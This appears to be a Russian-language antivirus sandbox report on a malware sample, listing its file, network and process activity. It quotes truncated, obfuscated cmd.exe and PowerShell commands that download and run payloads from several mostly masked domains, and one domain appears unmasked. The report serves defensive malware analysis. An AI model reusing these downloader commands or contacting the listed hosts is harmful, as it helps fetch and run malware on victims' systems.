Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V\C"set NV=j)i{,t.FBvS5I6fX\JG1dmOr}k-b'U%EPV:y$nA\q~olT=@WM0DLzsC g3;Yaxue+p4h9c7(wN8&&for %E in (65;42;72;30;32;29;8;51;12;54;34;41;11;4;19;30;23;30;1...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\166.exe
Удаляет следующие файлы
- %TEMP%\166.exe
Сетевая активность
TCP
Запросы HTTP GET
- http://se###enov.com/zkDgJJU
- http://tr#####atoanthan.net/9nz3IWjX
- http://tr#####atoanthan.net/
- http://ka####eyasam.org/FJzoe10vel
UDP
- DNS ASK dr####tontus.com
- DNS ASK se###enov.com
- DNS ASK tr#####atoanthan.net
- DNS ASK ka####eyasam.org
- DNS ASK te##.##yingsteel.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V\C"set NV=j)i{,t.FBvS5I6fX\JG1dmOr}k-b'U%EPV:y$nA\q~olT=@WM0DLzsC g3;Yaxue+p4h9c7(wN8&&for %E in (65;42;72;30;32;29;8;51;12;54;34;41;11;4;19;30;23;30;1...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V/C"set NV=j)i{,t.FBvS5I6fX/JG1dmOr}k-b'U%EPV:y$nA\q~olT=@WM0DLzsC g3;Yaxue+p4h9c7(wN8&&for %E in (65;42;72;30;32;29;8;51;12;54;34;41;11;4;19;30;23;30;10;31;10;10;12;22;73;73;38;48;31;34;41;26...
- '<SYSTEM32>\cmd.exe' /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $mijrf='ipjju';$fvtn=new-object Net.WebClient;$nkmzz='http://dr####tontus.com/Y7klprmAh@http://sen-renov.com/zkDgJJU@http://tr...
- '<SYSTEM32>\cmd.exe'
